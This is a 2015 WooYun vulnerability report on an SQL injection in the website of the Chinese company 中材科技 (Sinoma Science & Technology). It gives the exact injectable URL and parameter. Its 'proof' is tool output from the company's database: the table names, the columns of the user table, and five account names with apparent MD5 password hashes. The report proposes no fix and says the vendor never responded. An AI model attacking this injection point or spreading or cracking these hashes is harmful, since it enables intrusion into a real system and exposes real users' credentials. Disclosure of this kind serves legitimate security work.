漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0101427
漏洞标题:中材科技官网sql注入漏洞
相关厂商:中材科技
漏洞作者: 路人甲
提交时间:2015-03-17 11:50
修复时间:2015-05-01 11:52
公开时间:2015-05-01 11:52
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-01: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
…………
详细说明:
http://www.sinomatech.com/product.php?pid=10 注入点
漏洞证明:
![L~9)5%T(RY1[(L]T26$XF8E.jpg](http://wimg.zone.ci/upload/201503/14233415479c502084678ceb2a71fcba7a59168e.jpg)
Database: www_sinomatech_com
[9 tables]
+------------+
| user |
| article |
| comments |
| depart |
| department |
| feedback |
| items |
| voteonline |
| votesub |
+------------+
Database: www_sinomatech_com
Table: user
[10 columns]
+------------+------------------+
| Column | Type |
+------------+------------------+
| departid | smallint(5) |
| departname | varchar(50) |
| dptid | smallint(5) |
| email | varchar(50) |
| password | varchar(50) |
| telephone | varchar(50) |
| truename | varchar(50) |
| userid | int(10) unsigned |
| username | varchar(50) |
| webmaster | varchar(4) |
+------------+------------------+
Database: www_sinomatech_com
Table: user
[5 entries]
+-----------------+----------------------------------+
| username | password |
+-----------------+----------------------------------+
| \xd6?\xc1\xcb | ade7da3fb42b9ad5478a75302d21fe51 |
| \xc9?\xe1? | 1abf30cc763f972f6e8ab2a2812572c8 |
| ?????? | ade7da3fb42b9ad5478a75302d21fe51 |
| ?\xee\xd6?\xd4? | 4345c70ffbf913f910f0d7eb430e476c |
| ??\xce? | 5e8667a439c68f5145dd2fcbecf02209 |
+-----------------+----------------------------------+
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝